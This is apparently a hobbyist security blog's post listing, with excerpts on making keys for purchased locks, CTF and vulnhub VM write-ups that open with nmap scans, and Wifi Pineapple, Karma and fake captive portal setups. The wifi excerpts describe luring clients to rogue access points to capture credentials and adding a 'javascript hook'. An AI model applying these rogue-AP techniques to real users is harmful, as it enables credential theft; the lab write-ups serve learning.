Making Keys for locks

Friday, August 11. 2017

One of my hobbies is picking locks. As part of that hobby, I have attended workshops that have taught me various skills for gutting and repinning locks. One of the workshops was at SteelCon and presented by Mad Bob's Lockpicks. MadBob produce some really nice lock picks, so if you haven't heard of them before, check them out. The picks are so much better than the my crappy GOSO lock picks that I bought form Amazon.

For Steelcon this year, Scott Helme ran a "Stickers for Charity" stall. Madbob dropped off a bag of locks for the stall, and I purchased a couple. The couple in question didn't have any keys. I thought that would be ok, I could just repin them. Then it dawned on me, I would need a key for that. At that point, I had already purchased the locks.

Blank key and lock

The blank key and the lock before starting anything.

The lock I am going to walk through on how I made a key for is a six pin lock, branded ERA. Since I didn't have any blank keys, I ordered 10 off ebay, and waiting the few days for them to arrive. This is far more than I need for this one lock, so I plan to make a bump key, as well as try to make a key from just imprinting the key.

Tools Required:

  • Blank Keys

  • Files

  • Follower (A tube the same size as the barrel of the lock)

  • Shims (or a thin piece of metal which goes between the barrel and the lock)

  • Lock Pick (For Single Pin Picking)

  • Sand paper

  • A vise

Pentest Limited's BSides Edinburgh Write up

Thursday, June 1. 2017

This is the second VM that I have tried from Pentest Limited. The report of the Securi-Tay CTF challenge can be found here. As usual, I downloaded the VM (located here) and imported it in to virtual box. Once I had changed the networking to my local host based network (vmbox0), I was ready to start taking a closer look. Initially, I did a ping sweep to determine the IP address of the target.

# nmap -sP

Starting Nmap 7.40 ( ) at 2017-05-20 22:56 BST

Nmap scan report for

Host is up (0.000065s latency).

MAC Address: 08:00:27:E0:C9:C2 (Oracle VirtualBox virtual NIC)

Nmap scan report for (

Host is up (0.0012s latency).

MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)

Nmap scan report for

Host is up.

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.94 seconds

Once I had the IP address, I then performed a port scan of the main server to reveal a single TCP port open (80 - HTTP):

# nmap -sT

Starting Nmap 7.40 ( ) at 2017-05-20 22:56 BST

Nmap scan report for (

Host is up (0.00066s latency).

Not shown: 999 closed ports


80/tcp open  http

MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

So without much delay I fired up a web browser, burp suite, archni and dirbuster and took a closer look...

PwnLab - Init CTF write up.

Saturday, May 20. 2017

Pwnlab-init is a boot2root vm from vulnhub. The VM and background details can be found here. Once booted, a quick ping sweep via nmap reveals the IP address of the target as, and my attacker (Kali linux is on

Running a basic TCP scan of the VM revelled a few services:

# nmap -sT

Starting Nmap 7.40 ( ) at 2017-05-20 21:26 BST

Nmap scan report for

Host is up (0.0032s latency).

Not shown: 997 closed ports


80/tcp   open  http

111/tcp  open  rpcbind

3306/tcp open  mysql

MAC Address: 08:00:27:B8:8C:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Doing the next part of recon, I fire up Dirbuster to enumerate the webserver, to see if there is anything interesting on the server. I also open a web browser at the index page.

Pentest Limited's SecuriCTF Write up

Saturday, May 20. 2017

From time to time, I have time to look at and try some CTF (Capture the Flag) VMs to try to get root on. These are purpose built VMs to challenge people to break in. For the Securi-Tay 2017 conference, Pentest Limited released a CTF VM, and even though the solution was posted I decided to give it a go to see how I faired. The VM was aimed at the novice level, so I was in with a chance.

Once the VM was booted in virtualbox, I was presented with the IP address of the VM from inside the console screen. In this case my target was My attacking machine (Kali Linux) was sitting on As this is my virtualbox network, I knew that there shouldn't be anything else on the LAN, so I did a ping sweep to confirm, using nmap. The nmap command is

nmap -sP


Keybase on Kali Linux

Wednesday, May 10. 2017
Linux Security is a great platform for sharing PGP keys and verifying your identity online. The Linux tools the platform works with, however, don't run with Kali Linux out of the box. The reason is simple: Root (UID: 0) isn't supported. So how do you over come this limitation? In my case, my laptop is only used by me, and no one else.

NB, you should be using a dedicated machine to store your private keys. If not, you do run the risk of administrators being able to try to break in to keys / steal your keystrokes / etc. 

Vulnhub - Fristileaks walkthrough.

Saturday, April 9. 2016

Over at, there are a load of virtual machines ready to be broken, hacked or used as a learning tool. I like a challenge, so I thought I would have a go. All that is required is a suitable VM player, such as virtualbox. For my first challenge, I chose the Frisileaks VM . The Challenge is aimed at a beginner, and is pitched to take around 4 hours.

Once the OVA is downloaded, it is simple to import into virtualbox. I chose to use Kali linux for my host machine, which I would also be launching attacks from. I modified the setttings of the VM, to use a host-only adapter, as I like to have control over what my VMs are doing. Especially when I have just downloaded a random VM from the internet. One that is made for Hackers no-less. Finding out that it did something nasty wouldn't be great, especially as part of the challenge is to have minimal information about the vm before you start.

I also start my VMs headless, so as I later realised, the DHCP IP assigned IP address was sitting on the console for me. The main reason for starting headless is to lower my impatence and not cheat by rooting the vm straight out the box. So my first task was to identify what IP address the VM had been assigned. Fortunately, this vm responds to ICMP pings, so discovery was as simple as running:

nmap -sP


Monday, March 2. 2015

"Shellshock" is the name of a range of 6 vulnerabilities with the BASH command shell in linux. Details about the vulnerability can be found here (wikipedia).

When running the security Onion (see previous post), I noticed that people were trying various files to find a vulnerability on my webserver. Being the curious type, this prompted me to think, what is being queried and can I log it, following on to what would the malware do if I respond to it, if there is a pattern with the filename.

In order to try to find out more about this, I modified my 404 page (a php script) to include a file, which will record the information for us.

Security Onion

Thursday, February 26. 2015

The other day, I came across an interesting looking security suite called Security Onion. The author doesn't like the term distro, as it is more based on Ubuntu with extra packages, than a custom distribution like Kali. The main purpose of the distribution is a quick and easy distributed NSM platform.

NSM, or Network Security Monitor, is like an IDS. It differs by using multiple sources of information, and different analysis tools to find the bad packets. in addition, Security Onion is meant to become an IPS, so the rule-sets are never "dumbed down". This means you always see the alert, even if you do nothing. A false positive on an IPS is bad, but it may mean you miss something.

In Security Onion, there are three different types of  deployment, Standalone, Sensor or Server. A Standalone installation contains both a server and one or more sensors. After the break, I'll describe the parts in a bit more detail.


Monday, January 20. 2014

Nodogsplash is a program that creates a captive portal.

Captive portals are the controls / webpages that restrict access to wifi networks. Modern devices auto detect captive portals and even prompt you to enter the web page. So combined with karma on the pineapple, we now have a device that actively is trying to show content to wifi devices.

One of the basic uses of the wifi pineapple is to "rick-roll" visitors to the site. This doesn't require nodogsplash as the pineapple has a different infusion for that.

So, why use nodogsplash? Well, one reason is to try to emulate free wifi hotspots. With a little bit of grabbing of pages and images, you can make the pineapple look like most other free wifi networks out there. Of course, you can always add your own little bit of code, like a javascript hook...

What is Karma?

Sunday, January 19. 2014
Security Wifi

"KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host." -

 So, running Karma on your wifi router allows you to entice users on your network. Once onyour network, the real fun can begin.

Wifi Pineapple

Saturday, January 18. 2014
Security Wifi

Over Christmas, I decided to buy a new Wifi Pineapple from Hak5's hakshop. For the uninitiated, the wifi pineapple is a tool for pen testing wireless. 

Essentially, the tool is a wifi router with twin 802.11 radios, running openwrt supporting karma and a variety of modules ready to use.

  • CPU: 400 MHz MIPS Atheros AR9331 SoC.

  • Memory: 16 MB ROM, 64 MB DDR2 RAM

  • Disk: Micro SD support up to 32 GB, FAT or EXT, 2 GB Included

  • Mode Select: 5 DIP Switches - 2 System, 3 User configurable

  • Wireless: Atheros AR9331 IEEE 802.11 b/g/n + Realtek RTL8187 IEEE 802.11 a/b/g

  • Ports: (2) SMA Antenna, 10/100 Ethernet, USB 2.0, Micro SD, TTL Serial, Expansion Bus

  • Power: DC in Variable 5-12v, ~1A, 5.5mm*2.1mm connector, International Power Supply

  • Status Indicators: Power LED, Ethernet LED, Wireless 1 LED, Wireless 2 LED